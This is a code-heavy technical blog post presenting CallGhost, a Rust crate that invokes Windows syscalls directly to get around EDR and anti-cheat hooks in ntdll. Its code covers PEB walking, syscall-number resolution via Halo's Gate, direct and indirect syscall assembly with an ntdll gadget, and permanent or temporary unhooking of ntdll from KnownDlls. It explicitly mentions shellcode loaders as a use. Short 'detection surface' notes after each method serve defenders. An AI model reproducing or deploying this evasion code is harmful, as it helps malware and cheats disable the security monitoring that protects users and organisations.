CallGhost: Direct Syscalls from Rust with Four Bypass Methods

This post covers CallGhost, a Rust crate that provides direct syscall invocation on Windows x86_64. The framework bypasses usermode API hooks placed by EDR products and anti-cheat software by avoiding ntdll function stubs entirely or by restoring them from clean copies. It exposes a single syscall! macro that hashes function names at compile time, resolves syscall numbers (SSNs) at runtime (reading them from clean stubs and falling back to Halo’s Gate for hooked ones), and emits one of four inline assembly sequences depending on the chosen method.

Why Bypass ntdll Stubs

Nearly every usermode Windows API call that needs the kernel eventually passes through ntdll.dll. When a process calls NtAllocateVirtualMemory, execution flows through the ntdll export, which copies rcx into r10, loads the syscall number into eax, and executes the syscall instruction. The kernel reads the syscall number from eax and dispatches the request.

EDR products and anti-cheat engines hook these ntdll stubs. They overwrite the first bytes of each function with a jmp to their own handler, which inspects the arguments, logs the call, and decides whether to allow it [1]. The actual API call still works, but the hooking agent sees everything that passes through ntdll.

Direct syscalls skip the ntdll stub entirely. The calling code loads the syscall number into eax and executes syscall from its own module. The kernel’s dispatcher does not check where the instruction executed; it reads eax for the syscall number and the registers and stack for the arguments [2]. The hook never runs because execution never reaches ntdll. For context on how hooking frameworks like MinHook intercept API calls at the stub level (the exact mechanism that direct syscalls bypass), see the MinHook API interception post.

The problem is that syscall numbers are not stable across Windows versions [3]. The same function can use SSN 0x18 on one build and 0x19 on a later one, so hardcoded SSNs break portability. CallGhost solves this by resolving SSNs at runtime from the ntdll export table, even when the stubs are hooked.

The Three Crates

CallGhost is a workspace of three crates:

  • callghost (facade): Re-exports the syscall! macro and exposes the runtime via a __private module.
  • callghost-macros (proc macro): Parses the macro invocation at compile time, hashes the function name, and generates method-specific Rust code with inline assembly.
  • callghost-runtime (no_std): PEB walking, export table parsing, SSN resolution, SSN caching, gadget finding, and all unhooking infrastructure. Zero dependencies beyond core.
// From: src/lib.rs
pub use callghost_macros::syscall;

#[doc(hidden)]
pub mod __private {
    pub use callghost_runtime::*;
}

The no_std runtime means CallGhost works in shellcode loaders and other environments where the C runtime is not available. The only requirement is that ntdll.dll is loaded in the process (which is always true on Windows, since the loader itself lives in ntdll).

The syscall! Macro

The user-facing API is a single macro:

// NtAllocateVirtualMemory with 6 arguments, direct method (default)
let status = syscall!(NtAllocateVirtualMemory, -1isize,
    &mut base, 0usize, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// Same call, indirect method
let status = syscall!(indirect, NtAllocateVirtualMemory, -1isize,
    &mut base, 0usize, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

The macro accepts an optional method keyword (direct, indirect, unhook, perunsfart), a function name as a bare identifier, and up to 12 arguments. If no method is specified, it defaults to direct.

The proc macro in callghost-macros parses this input and dispatches to a method-specific code generator:

// From: callghost-macros/src/lib.rs
#[proc_macro]
pub fn syscall(input: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(input as SyscallInput);
    let method = input.method.as_deref().unwrap_or("direct");
    let fn_name_str = input.fn_name.to_string();
    let fn_name_bytes = proc_macro2::Literal::byte_string(fn_name_str.as_bytes());
    let num_args = input.args.len();

    if num_args > 12 {
        return syn::Error::new_spanned(&input.fn_name, "callghost: max 12 arguments")
            .to_compile_error().into();
    }

    match method {
        "direct" => gen_direct(&input.args, num_args, &fn_name_bytes),
        "indirect" => gen_indirect(&input.args, num_args, &fn_name_bytes),
        "unhook" => gen_unhook(&input.args, num_args, &fn_name_bytes),
        "perunsfart" => gen_perunsfart(&input.args, num_args, &fn_name_bytes),
        _ => syn::Error::new_spanned(&input.fn_name, "unknown method")
            .to_compile_error().into(),
    }
}

The function name is hashed at compile time using FNV-1a. No string containing "NtAllocateVirtualMemory" appears in the final binary.

Compile-Time Hashing with FNV-1a

Every function name is converted to a 32-bit FNV-1a hash before any runtime work happens. The hash function is const, so the Rust compiler evaluates it during compilation:

// From: callghost-runtime/src/lib.rs
pub const fn fnv1a(name: &[u8]) -> u32 {
    let mut hash: u32 = 0x811c9dc5;
    let mut i = 0;
    while i < name.len() {
        hash ^= name[i] as u32;
        hash = hash.wrapping_mul(0x01000193);
        i += 1;
    }
    hash
}

The generated code for each syscall! invocation includes a const binding:

// Generated by the macro at compile time
const __CG_HASH: u32 = ::callghost::__private::fnv1a(b"NtAllocateVirtualMemory");

FNV-1a is a non-cryptographic hash with good distribution and a low collision rate for short inputs [4]. It is common in syscall frameworks because it is trivial to implement without dependencies. The 32-bit output is sufficient for the ~460 Nt/Zw exports in ntdll.
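The hash can be checked against the published FNV-1a 32-bit test vectors, and binding the result to a const forces the compiler to evaluate it, which is what keeps the plain-text name out of the binary. The sketch below copies fnv1a from the listing above; NT_ALLOCATE_HASH is a hypothetical name standing in for the macro’s generated __CG_HASH.

```rust
/// 32-bit FNV-1a, identical to the runtime's fnv1a.
pub const fn fnv1a(name: &[u8]) -> u32 {
    let mut hash: u32 = 0x811c9dc5; // FNV-1a offset basis
    let mut i = 0;
    while i < name.len() {
        hash ^= name[i] as u32; // xor the byte in first...
        hash = hash.wrapping_mul(0x01000193); // ...then multiply by the FNV prime
        i += 1;
    }
    hash
}

// Hypothetical binding: evaluated by the compiler, so only the u32 reaches the binary.
pub const NT_ALLOCATE_HASH: u32 = fnv1a(b"NtAllocateVirtualMemory");

// Compile-time checks against the reference FNV-1a test vectors.
const _: () = assert!(fnv1a(b"") == 0x811c9dc5);
const _: () = assert!(fnv1a(b"a") == 0xe40c292c);
```

If either const assertion failed, the crate would not compile, so a broken port of the hash is caught before any runtime lookup happens.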

PEB Walking and ntdll Discovery

Before any syscall can be issued, the runtime needs the base address of ntdll.dll. CallGhost finds it by walking the Process Environment Block (PEB) [5], which is accessible from the GS segment register on x86_64:

// From: callghost-runtime/src/lib.rs
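use core::arch::asm;

#[cfg(all(target_os = "windows", target_arch = "x86_64"))]
unsafe fn get_peb() -> *mut u8 {
    let peb: *mut u8;
    // gs:[0x60] is a memory read (TEB->ProcessEnvironmentBlock), so `readonly` rather than `nomem`.
    unsafe { asm!("mov {}, gs:[0x60]", out(reg) peb, options(nostack, readonly, preserves_flags)); }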
    peb
}

On 64-bit Windows the GS segment base points at the Thread Environment Block, and gs:[0x60] holds the pointer to the PEB. At offset 0x18 the PEB holds a pointer to the PEB_LDR_DATA structure (Ldr), and at offset 0x20 inside PEB_LDR_DATA is the InMemoryOrderModuleList, a doubly-linked list of LDR_DATA_TABLE_ENTRY structures [5]. The walker iterates this list and compares each module’s BaseDllName against "ntdll.dll" using a case-insensitive ASCII-to-UTF-16 comparison:

// From: callghost-runtime/src/lib.rs
fn ascii_eq_unicode_ci(ascii: &[u8], unicode: &[u16]) -> bool {
    if ascii.len() != unicode.len() { return false; }
    let mut i = 0;
    while i < ascii.len() {
        let a = if ascii[i] >= b'A' && ascii[i] <= b'Z' { ascii[i] + 32 } else { ascii[i] };
        let u = if unicode[i] >= b'A' as u16 && unicode[i] <= b'Z' as u16 { unicode[i] + 32 } else { unicode[i] };
        if a as u16 != u { return false; }
        i += 1;
    }
    true
}
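The comparison can be exercised off-target by encoding the module name with str::encode_utf16, which yields the same kind of UTF-16 code units a loader entry’s BaseDllName buffer holds. In this sketch the function is copied from the listing above and utf16 is a hypothetical test helper.

```rust
/// Case-insensitive comparison of an ASCII byte string against UTF-16 code units
/// (copied from the runtime listing).
fn ascii_eq_unicode_ci(ascii: &[u8], unicode: &[u16]) -> bool {
    if ascii.len() != unicode.len() { return false; }
    let mut i = 0;
    while i < ascii.len() {
        // Fold A-Z to a-z on both sides before comparing.
        let a = if ascii[i] >= b'A' && ascii[i] <= b'Z' { ascii[i] + 32 } else { ascii[i] };
        let u = if unicode[i] >= b'A' as u16 && unicode[i] <= b'Z' as u16 { unicode[i] + 32 } else { unicode[i] };
        if a as u16 != u { return false; }
        i += 1;
    }
    true
}

/// Hypothetical helper: encode a &str as UTF-16 code units for experiments.
fn utf16(s: &str) -> Vec<u16> {
    s.encode_utf16().collect()
}
```

When reading BaseDllName from memory, note that UNICODE_STRING.Length counts bytes, so the slice passed as unicode has Length / 2 elements.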

The base address is cached in an AtomicPtr after the first lookup. Subsequent calls return the cached value without re-walking the PEB.
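The lookup-once pattern can be sketched with AtomicPtr alone. Here walk_peb_for_ntdll is a hypothetical stand-in that returns a fake, never-dereferenced address and counts its own invocations; the runtime’s actual memory orderings may differ.

```rust
use core::sync::atomic::{AtomicPtr, AtomicUsize, Ordering};

/// Cached ntdll base; null means "not resolved yet".
static NTDLL_BASE: AtomicPtr<u8> = AtomicPtr::new(core::ptr::null_mut());
/// Number of times the expensive lookup actually ran (for demonstration only).
static LOOKUPS: AtomicUsize = AtomicUsize::new(0);

/// Hypothetical stand-in for the PEB walk: returns a fake address that is never dereferenced.
fn walk_peb_for_ntdll() -> *mut u8 {
    LOOKUPS.fetch_add(1, Ordering::Relaxed);
    0x7ff0_0000usize as *mut u8
}

/// Return the cached base, walking the PEB only when nothing is cached yet.
fn get_ntdll_base() -> *mut u8 {
    let cached = NTDLL_BASE.load(Ordering::Acquire);
    if !cached.is_null() {
        return cached;
    }
    let base = walk_peb_for_ntdll();
    NTDLL_BASE.store(base, Ordering::Release);
    base
}
```

Two threads racing on the first call may both perform the walk, but both store the same base, so no lock is needed.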

SSN Resolution: Clean Stubs and Halo’s Gate

Once ntdll’s base address is known, the runtime parses its PE export table to find the target function. It then attempts to extract the SSN directly from the stub bytes. A clean (unhooked) ntdll stub begins with mov r10, rcx; mov eax, <SSN>:

// From: callghost-runtime/src/lib.rs
unsafe fn extract_ssn_clean(stub: *const u8) -> Option<u16> {
    unsafe {
        if *stub == 0x4c && *stub.add(1) == 0x8b && *stub.add(2) == 0xd1 && *stub.add(3) == 0xb8 {
            return Some(core::ptr::read_unaligned(stub.add(4) as *const u16)); // no alignment assumption on the imm32
        }
    }
    None
}

The byte sequence 4C 8B D1 B8 corresponds to mov r10, rcx followed by the opcode of mov eax, imm32. The SSN is the low 16 bits of that imm32 operand, which starts at offset 4. If these bytes are present, the stub is clean and the SSN is read directly.
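The same check can be written over a byte slice with a slice pattern, which makes it testable on synthetic stub bytes without reading a real ntdll. This is a sketch rather than the runtime’s code:

```rust
/// Slice-based variant of extract_ssn_clean: matches `mov r10, rcx` (4C 8B D1)
/// followed by `mov eax, imm32` (B8 + 4 bytes) and returns the low 16 bits of imm32.
fn extract_ssn_clean(stub: &[u8]) -> Option<u16> {
    match stub {
        // lo/hi are the first two little-endian bytes of the imm32.
        [0x4C, 0x8B, 0xD1, 0xB8, lo, hi, ..] => Some(u16::from_le_bytes([*lo, *hi])),
        // Anything else (a jmp hook, a truncated buffer) is treated as not clean.
        _ => None,
    }
}
```

Fed the bytes 4C 8B D1 B8 18 00 00 00, it returns Some(0x18); a stub that starts with a jmp (E9 ...) returns None, which is the cue to fall back to the neighbor search.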

If the stub is hooked (the first bytes have been overwritten with a jmp), the clean extraction fails. This is where Halo’s Gate comes in [6]. The key observation is that SSNs are assigned sequentially: when ntdll’s syscall stubs are sorted by address, each stub’s SSN is exactly one greater than the previous one’s. If the target stub is hooked but a neighboring stub is clean, the target’s SSN follows by adding or subtracting the distance between them.

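The resolver collects all Nt/Zw exports (identified by name prefix), sorts them by RVA, and removes duplicates, since each Zw export is an alias for the Nt export at the same address (deduped is the resulting count). It then searches outward from the target’s position in both directions: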

// From: callghost-runtime/src/lib.rs
for d in 1..=12usize {
    if target_pos >= d {
        let p = unsafe { base.add(stubs[target_pos - d].rva as usize) };
        if let Some(ssn) = unsafe { extract_ssn_clean(p) } { return Some(ssn + d as u16); }
    }
    if target_pos + d < deduped {
        let p = unsafe { base.add(stubs[target_pos + d].rva as usize) };
        if let Some(ssn) = unsafe { extract_ssn_clean(p) } { return Some(ssn - d as u16); }
    }
}

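If the stub three positions earlier (at a lower RVA) has a clean SSN of 0x24, the target’s SSN is 0x24 + 3 = 0x27; a clean stub three positions later would hold 0x2A, giving 0x2A - 3 = 0x27. The search radius of 12 is sufficient for any realistic hooking scenario: for the search to fail, an EDR would have to hook every stub within 12 positions on both sides of the target, which would be unusual.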
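The neighbor search can be modeled without a live process. In the sketch below, Stub and its ssn_if_clean field are hypothetical: ssn_if_clean stands in for what extract_ssn_clean would read from memory, with None modeling a hooked stub. Sorting by RVA and de-duplicating mirrors the collect, sort, and dedupe steps described above; unlike the listing, this version uses checked_sub so that an inconsistent neighbor yields None instead of underflowing.

```rust
/// One export as the resolver sees it (hypothetical model).
#[derive(Clone, Copy)]
struct Stub {
    rva: u32,
    /// What extract_ssn_clean would return for this stub; None models a hook.
    ssn_if_clean: Option<u16>,
}

/// Halo's Gate-style resolution over a modeled export list.
fn resolve_ssn(mut stubs: Vec<Stub>, target_rva: u32, radius: usize) -> Option<u16> {
    stubs.sort_by_key(|s| s.rva);
    stubs.dedup_by_key(|s| s.rva); // Nt/Zw aliases share an RVA
    let pos = stubs.iter().position(|s| s.rva == target_rva)?;
    if let Some(ssn) = stubs[pos].ssn_if_clean {
        return Some(ssn); // the target itself is clean
    }
    for d in 1..=radius {
        if pos >= d {
            if let Some(ssn) = stubs[pos - d].ssn_if_clean {
                return Some(ssn + d as u16); // clean neighbor at a lower address
            }
        }
        if pos + d < stubs.len() {
            if let Some(ssn) = stubs[pos + d].ssn_if_clean {
                return ssn.checked_sub(d as u16); // clean neighbor at a higher address
            }
        }
    }
    None
}
```

With ten stubs whose SSNs equal their index and stubs 3 to 5 hooked, resolving stub 4 finds stub 2 at distance 2 and returns 2 + 2 = 4; with a radius of 1 it returns None.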

Resolved SSNs are stored in a direct-mapped cache (256 entries, indexed by hash modulo 256). A collision silently overwrites the previous entry, so the evicted function simply has to be re-resolved the next time it is called:

// From: callghost-runtime/src/lib.rs
const SSN_CACHE_SIZE: usize = 256;
static mut SSN_CACHE: [u64; SSN_CACHE_SIZE] = [0u64; SSN_CACHE_SIZE];

fn ssn_pack(hash: u32, ssn: u16) -> u64 {
    ((hash as u64) << 32) | (ssn as u64) | 0x10000
}

fn ssn_lookup(hash: u32) -> Option<u16> {
    let idx = (hash as usize) % SSN_CACHE_SIZE;
    let entry = unsafe { core::ptr::read_volatile(&SSN_CACHE[idx]) };
    let stored_hash = (entry >> 32) as u32;
    if stored_hash == hash && (entry & 0x10000) != 0 {
        Some(entry as u16)
    } else {
        None
    }
}

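Each cache entry packs the 32-bit hash (bits 32 to 63) and the 16-bit SSN (bits 0 to 15) into a single u64, with a valid flag at bit 16 so that an empty slot is never mistaken for hash 0 with SSN 0. Because each entry is a naturally aligned u64, a single 8-byte store is atomic at the hardware level on x86_64, so a reader never sees a torn entry.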
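One way to get the same packed layout without static mut is to make each slot an AtomicU64. The sketch below is a hypothetical variant, not the crate’s code; it keeps the bit layout above (hash in the high 32 bits, valid flag at bit 16, SSN in the low 16 bits) and the modulo-256 indexing.

```rust
use core::sync::atomic::{AtomicU64, Ordering};

const SSN_CACHE_SIZE: usize = 256;
const VALID: u64 = 0x1_0000; // bit 16 marks an occupied slot

/// Direct-mapped SSN cache with atomic slots (hypothetical variant).
struct SsnCache {
    slots: [AtomicU64; SSN_CACHE_SIZE],
}

impl SsnCache {
    fn new() -> Self {
        SsnCache { slots: core::array::from_fn(|_| AtomicU64::new(0)) }
    }

    /// Hash in bits 32..63, valid flag in bit 16, SSN in bits 0..15.
    fn pack(hash: u32, ssn: u16) -> u64 {
        ((hash as u64) << 32) | VALID | (ssn as u64)
    }

    fn insert(&self, hash: u32, ssn: u16) {
        let idx = hash as usize % SSN_CACHE_SIZE;
        // Overwrites whatever was in the slot: a collision evicts the old entry.
        self.slots[idx].store(Self::pack(hash, ssn), Ordering::Relaxed);
    }

    fn lookup(&self, hash: u32) -> Option<u16> {
        let idx = hash as usize % SSN_CACHE_SIZE;
        let entry = self.slots[idx].load(Ordering::Relaxed);
        // Hit only if the slot is occupied and holds this exact hash.
        if (entry >> 32) as u32 == hash && (entry & VALID) != 0 {
            Some(entry as u16)
        } else {
            None
        }
    }
}
```

Hashes 0x1234_5678 and 0x1234_5778 both land in slot 0x78, so inserting the second evicts the first, and the next lookup of the first misses and triggers a re-resolve. Relaxed loads and stores of an aligned u64 compile to ordinary mov instructions on x86_64, so the atomic slots cost nothing over the volatile version.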

Method 1: Direct Syscall

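The direct method is the simplest. It loads the SSN into eax, copies rcx to r10, and executes syscall. The copy is needed because the syscall instruction overwrites rcx with the return address (and r11 with RFLAGS), so the Windows kernel reads the first argument from r10 instead [2]: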

// From: callghost-runtime/src/lib.rs
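use core::arch::asm;

unsafe fn raw_syscall(ssn: u16, a0: u64, a1: u64, a2: u64, a3: u64) -> i32 {
    let result: u64;
    unsafe {
        asm!(
            // syscall clobbers rcx (return rip) and r11 (rflags); the kernel takes arg 1 from r10.
            "mov r10, rcx", "syscall",
            // Binding the SSN straight to rax means no scratch register can alias r10
            // (a reg-class input may share a register with a lateout such as r10).
            inlateout("rax") ssn as u64 => result,
            inlateout("rcx") a0 => _, inlateout("rdx") a1 => _,
            inlateout("r8") a2 => _, inlateout("r9") a3 => _,
            lateout("r10") _, lateout("r11") _,
            options(nostack),
        );
    }
    result as i32
}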

For calls with more than 4 arguments, the macro generates stack setup code. The x64 calling convention places the first 4 arguments in rcx, rdx, r8, r9; additional arguments go on the stack at [rsp+0x28] and above [7]. The extra arguments are collected into a stack buffer, then copied to their stack slots via a single temporary register. This avoids consuming one register per extra argument, which would exhaust the available registers for high-argument-count syscalls like NtCreateFile (11 arguments):

// From: callghost-macros/src/lib.rs
fn gen_direct_stack_asm(ids: &[Ident], n: usize) -> proc_macro2::TokenStream {
    let extra = n - 4;
    let ss = (0x28 + extra * 8 + 15) & !15;
    let sub = format!("sub rsp, 0x{:x}", ss);
    let add = format!("add rsp, 0x{:x}", ss);
    let copy_lines: Vec<String> = (0..extra).flat_map(|i| vec![
        format!("mov {{__cg_tmp}}, [{{__cg_buf}}+{}]", i * 8),
        format!("mov [rsp+0x{:x}], {{__cg_tmp}}", 0x28 + i * 8),
    ]).collect();
    let eids: Vec<&Ident> = (0..extra).map(|i| &ids[i + 4]).collect();
    let extra_lit = proc_macro2::Literal::usize_unsuffixed(extra);
    // ...
    quote! {
        let __cg_stack_buf: [u64; #extra_lit] = [#(#eids),*];
        core::arch::asm!(
            // Load eax before writing r10, in case the allocator placed __cg_ssn in r10.
            #sub, #(#copy_lines,)* "mov eax, {__cg_ssn:e}", "mov r10, rcx", "syscall", #add,
            __cg_ssn = inlateout(reg) __cg_ssn as u64 => _,
            __cg_buf = inlateout(reg) __cg_stack_buf.as_ptr() as u64 => _,
            __cg_tmp = out(reg) _,
            // ... register args and clobbers
        );
    }
}

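The buffer approach uses only two extra registers (__cg_buf for the array pointer and __cg_tmp for the unrolled copies) regardless of how many stack arguments there are. Rounding the frame size up to a multiple of 16 preserves the 16-byte stack alignment that Rust guarantees on entry to an asm! block. The 0x28 base offset covers the 32-byte shadow space plus the 8-byte slot where the return address would sit had the code called an ntdll stub, which is the layout the kernel assumes when it reads stack arguments.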

Detection surface: The syscall instruction executes inside the calling module, not in ntdll. Any EDR that checks where the syscall returns to in user mode will see an address in the caller’s .text section rather than in ntdll. This is the main weakness of the direct method.

Method 2: Indirect Syscall via ntdll Gadget

The indirect method addresses the return address problem. Instead of executing syscall itself, it calls into a syscall; ret gadget found inside ntdll’s .text section. The syscall instruction therefore executes from ntdll, so the user-mode address the kernel records for the return lies inside ntdll, which looks legitimate to checks that only ask where the syscall was issued [8].

The gadget finder scans ntdll’s .text section for the byte sequence 0F 05 C3 (syscall; ret):

// From: callghost-runtime/src/lib.rs
for i in 0..size.saturating_sub(2) {
    let p = unsafe { text.add(i) };
    if unsafe { *p == 0x0F && *p.add(1) == 0x05 && *p.add(2) == 0xC3 } {
        GADGET.store(p, Ordering::Relaxed);
        return p;
    }
}
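Over a byte slice the scan reduces to a windows(3) search. This is a sketch for experimenting with synthetic buffers, not the runtime’s pointer-based loop:

```rust
/// Offset of the first `syscall; ret` (0F 05 C3) in `text`, if any.
fn find_syscall_ret(text: &[u8]) -> Option<usize> {
    // windows(3) yields every 3-byte run; buffers shorter than 3 yield nothing.
    text.windows(3).position(|w| w == [0x0F, 0x05, 0xC3])
}
```

Like the original loop, it returns the first match, so a lone 0F 05 that is not followed by C3 is skipped.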

The .text section is located by walking the PE section headers and comparing names:

// From: callghost-runtime/src/lib.rs
unsafe fn find_text_section(base: *mut u8) -> Option<(*mut u8, usize)> {
    // ... parse section headers
    for i in 0..num_sec as usize {
        let sec = unsafe { first.add(i * 40) };
        let name = unsafe { core::slice::from_raw_parts(sec, 8) };
        // Section names are 8 bytes, NUL-padded; comparing all 8 avoids matching ".textbss"
        if name == b".text\0\0\0" {
            let vsize = unsafe { *(sec.add(8) as *const u32) } as usize;
            let vaddr = unsafe { *(sec.add(12) as *const u32) } as usize;
            return Some((unsafe { base.add(vaddr) }, vsize));
        }
    }
    None
}
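The header walk can also be written against a byte buffer using u32::from_le_bytes, which avoids unaligned pointer reads. In this hypothetical find_section, the caller passes the full 8-byte, NUL-padded name, so .text and .textbss cannot be confused; it returns (VirtualAddress, VirtualSize) to mirror the original.

```rust
use core::convert::TryFrom;

/// Size of one IMAGE_SECTION_HEADER in bytes.
const SECTION_HEADER_SIZE: usize = 40;

/// Search `count` section headers for an exact 8-byte name (hypothetical helper).
fn find_section(headers: &[u8], count: usize, wanted: &[u8; 8]) -> Option<(u32, u32)> {
    for i in 0..count {
        let start = i * SECTION_HEADER_SIZE;
        // Returns None if the buffer holds fewer headers than `count` claims.
        let sec = headers.get(start..start + SECTION_HEADER_SIZE)?;
        if &sec[..8] == wanted {
            // VirtualSize at +8, VirtualAddress at +12, both little-endian u32.
            let vsize = u32::from_le_bytes(<[u8; 4]>::try_from(&sec[8..12]).ok()?);
            let vaddr = u32::from_le_bytes(<[u8; 4]>::try_from(&sec[12..16]).ok()?);
            return Some((vaddr, vsize));
        }
    }
    None
}
```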

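The gadget address is cached in an AtomicPtr. The indirect assembly replaces syscall with a call to the gadget: the syscall instruction then runs inside ntdll, and the gadget’s ret uses the return address that call pushed to come back to the caller: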

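// Generated by macro for indirect ≤4 args
core::arch::asm!(
    "mov r10, rcx", "call {gadget}",
    // SSN goes straight into rax (the status comes back there too); r10 is an early
    // clobber, so {gadget} can be allocated to neither rax nor r10.
    gadget = in(reg) __cg_gadget as u64,
    inlateout("rax") __cg_ssn as u64 => __cg_rax,
    out("r10") _,
    // ...
);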

For stack arguments, the indirect method uses a base offset of 0x20 instead of 0x28. The call instruction itself pushes 8 bytes (the return address), so the kernel sees the 5th argument at [rsp+0x28] as expected.
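The offset bookkeeping for both paths is easy to check with plain arithmetic. In this sketch direct_frame_size reproduces the macro’s ss formula, while stack_slot and kernel_view are hypothetical helpers encoding the 0x28 and 0x20 base offsets described above. The frame-size formula of the indirect path is not shown in the source, so it is not modeled here.

```rust
/// Frame reserved by the direct path: 0x28 (shadow space plus return-address slot)
/// + 8 bytes per stack argument, rounded up to a multiple of 16 (the macro's `ss`).
fn direct_frame_size(num_args: usize) -> usize {
    let extra = num_args.saturating_sub(4);
    (0x28 + extra * 8 + 15) & !15
}

/// Offset from rsp at which argument `k` (0-based, k >= 4) is written before the transfer.
fn stack_slot(k: usize, indirect: bool) -> usize {
    assert!(k >= 4, "the first four arguments travel in registers");
    let base = if indirect { 0x20 } else { 0x28 };
    base + (k - 4) * 8
}

/// Offset from rsp that the kernel sees when `syscall` executes:
/// the indirect path's `call` has pushed 8 more bytes by then.
fn kernel_view(k: usize, indirect: bool) -> usize {
    let pushed = if indirect { 8 } else { 0 };
    stack_slot(k, indirect) + pushed
}
```

For NtCreateFile (11 arguments, 7 on the stack) the direct frame is 0x60 bytes, and on both paths every stack argument sits at the same offset from rsp at the moment syscall executes, starting at 0x28.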

Detection surface: The syscall now originates from ntdll, which passes checks that only look at where the syscall instruction lives. However, the gadget is simply the first syscall; ret found in .text, so it sits in the middle of an unrelated stub rather than the function whose SSN is in eax, and the next return address on the stack points straight back into the caller’s module. A defender who walks the callstack, or who checks that the SSN matches the stub containing the syscall instruction, could detect this. For a detailed look at how callstack validation detects these patterns, see the Peregrine callstack validation post.

Method 3: Permanent Unhook from KnownDlls

The unhook method takes a different approach: instead of avoiding the stub, it restores the hooked stub to its original bytes before executing through it. The clean bytes come from a fresh mapping of ntdll obtained via the KnownDlls object directory [9].

KnownDlls is a Windows mechanism in which the session manager creates image section objects for common system DLLs at boot, so processes can map them without re-reading the files from disk. The section \KnownDlls\ntdll.dll is built from the on-disk image, so it is unaffected by hooks patched into this process’s copy of ntdll. The runtime maps it via NtOpenSection and NtMapViewOfSection, both of which are themselves invoked via direct syscalls (bootstrapping with whatever SSN resolution is available):

// From: callghost-runtime/src/lib.rs
const KNOWN_DLLS_PATH: [u16; 20] = [
    b'\\' as u16, b'K' as u16, b'n' as u16, b'o' as u16, b'w' as u16,
    b'n' as u16, b'D' as u16, b'l' as u16, b'l' as u16, b's' as u16,
    b'\\' as u16, b'n' as u16, b't' as u16, b'd' as u16, b'l' as u16,
    b'l' as u16, b'.' as u16, b'd' as u16, b'l' as u16, b'l' as u16,
];

The path is stored as a u16 array (UTF-16) to construct the UNICODE_STRING structure that NT APIs expect. No string conversion at runtime, no allocator dependency.
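Writing the UTF-16 array by hand is error-prone; a const fn can widen an ASCII byte string at compile time and still needs no allocator. The sketch below is an alternative to the hand-written table, not the crate’s code; ascii_to_utf16, UnicodeString, and unicode_string are hypothetical names, and the struct follows the documented UNICODE_STRING layout, whose Length and MaximumLength fields are byte counts.

```rust
/// Widen an ASCII byte string to UTF-16 code units at compile time.
const fn ascii_to_utf16<const N: usize>(s: &[u8; N]) -> [u16; N] {
    let mut out = [0u16; N];
    let mut i = 0;
    while i < N {
        out[i] = s[i] as u16; // ASCII maps 1:1 onto UTF-16 code units
        i += 1;
    }
    out
}

/// A static (not a const) so the buffer has one fixed address for the pointer below.
static KNOWN_DLLS_PATH: [u16; 20] = ascii_to_utf16(b"\\KnownDlls\\ntdll.dll");

/// Layout of the NT UNICODE_STRING; lengths are in bytes, not characters.
#[repr(C)]
struct UnicodeString {
    length: u16,
    maximum_length: u16,
    buffer: *const u16,
}

/// Build a UNICODE_STRING over `units` (no NUL terminator required).
fn unicode_string(units: &[u16]) -> UnicodeString {
    let bytes = (units.len() * 2) as u16;
    UnicodeString { length: bytes, maximum_length: bytes, buffer: units.as_ptr() }
}
```

For this 20-character path, both lengths come out to 40 bytes.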

The unhook operation copies 32 bytes from the clean mapping over the hooked stub, temporarily making the page writable via NtProtectVirtualMemory:

// From: callghost-runtime/src/lib.rs
unsafe fn copy_clean_bytes(hooked_stub: *mut u8, hash: u32, len: usize) {
    let clean = unsafe { get_clean_ntdll() };
    let dir = unsafe { get_export_dir(clean) }.expect("callghost: clean ntdll exports");
    let rva = unsafe { resolve_export_rva(clean, dir, hash) }.expect("callghost: fn not in clean ntdll");
    let src = unsafe { clean.add(rva as usize) };
    let old = unsafe { protect_mem(hooked_stub, len, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(src, hooked_stub, len) };
    unsafe { protect_mem(hooked_stub, len, old) };
}

After the copy, the stub is permanently restored. The macro-generated code for the unhook method calls unhook_stub before resolving the SSN and issuing a direct syscall:

// Generated by macro for unhook method
const __CG_HASH: u32 = ::callghost::__private::fnv1a(b"NtQueryInformationProcess");
unsafe { ::callghost::__private::unhook_stub(__CG_HASH) };
let __cg_ssn: u16 = unsafe { ::callghost::__private::get_ssn(__CG_HASH) };
// ... direct syscall assembly

There is also an unhook_all function that restores the entire .text section of ntdll in a single copy:

// From: callghost-runtime/src/lib.rs
pub unsafe fn unhook_all() {
    let base = unsafe { get_ntdll_base() };
    let clean = unsafe { get_clean_ntdll() };
    let (text, tsize) = unsafe { find_text_section(base) }.expect("callghost: .text not found");
    let (ctxt, csize) = unsafe { find_text_section(clean) }.expect("callghost: .text not found in clean");
    let n = tsize.min(csize);
    let old = unsafe { protect_mem(text, n, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(ctxt, text, n) };
    unsafe { protect_mem(text, n, old) };
}

Detection surface: The hooks are gone. If the EDR re-scans its hooks (periodic integrity checks), it will notice they have been removed. The NtProtectVirtualMemory call to make .text writable is also suspicious; page protection changes on ntdll are a strong signal.

Method 4: Perun’s Fart (Temporary Unhook)

Perun’s Fart [10] combines the clean-stub approach with stealth: it restores the hooked bytes after the call completes. The stub is clean only for the duration of a single function invocation.

The prepare step saves the current (hooked) bytes and overwrites them with clean ones:

// From: callghost-runtime/src/lib.rs
pub unsafe fn perunsfart_prepare(hash: u32) -> PerunState {
    let stub = unsafe { get_function_address(hash) };
    let mut saved = [0u8; STUB_SIZE];
    unsafe { core::ptr::copy_nonoverlapping(stub, saved.as_mut_ptr(), STUB_SIZE) };
    unsafe { copy_clean_bytes(stub, hash, STUB_SIZE) };
    PerunState { stub, saved }
}

The macro generates code that calls the now-clean stub via a function pointer transmute, then restores the hooked bytes:

// Generated by macro for perunsfart method
let __cg_state = unsafe { ::callghost::__private::perunsfart_prepare(__CG_HASH) };
// ... argument bindings
let __cg_ret: i32 = unsafe {
    let __cg_fn: unsafe extern "system" fn(u64, u64, u64, u64, u64) -> i32 =
        core::mem::transmute(__cg_state.stub);
    __cg_fn(__cg_a0, __cg_a1, __cg_a2, __cg_a3, __cg_a4)
};
unsafe { ::callghost::__private::perunsfart_restore(&__cg_state) };

The restore step copies the saved (hooked) bytes back:

// From: callghost-runtime/src/lib.rs
pub unsafe fn perunsfart_restore(state: &PerunState) {
    let old = unsafe { protect_mem(state.stub, STUB_SIZE, PAGE_EXECUTE_READWRITE) };
    unsafe { core::ptr::copy_nonoverlapping(state.saved.as_ptr(), state.stub, STUB_SIZE) };
    unsafe { protect_mem(state.stub, STUB_SIZE, old) };
}

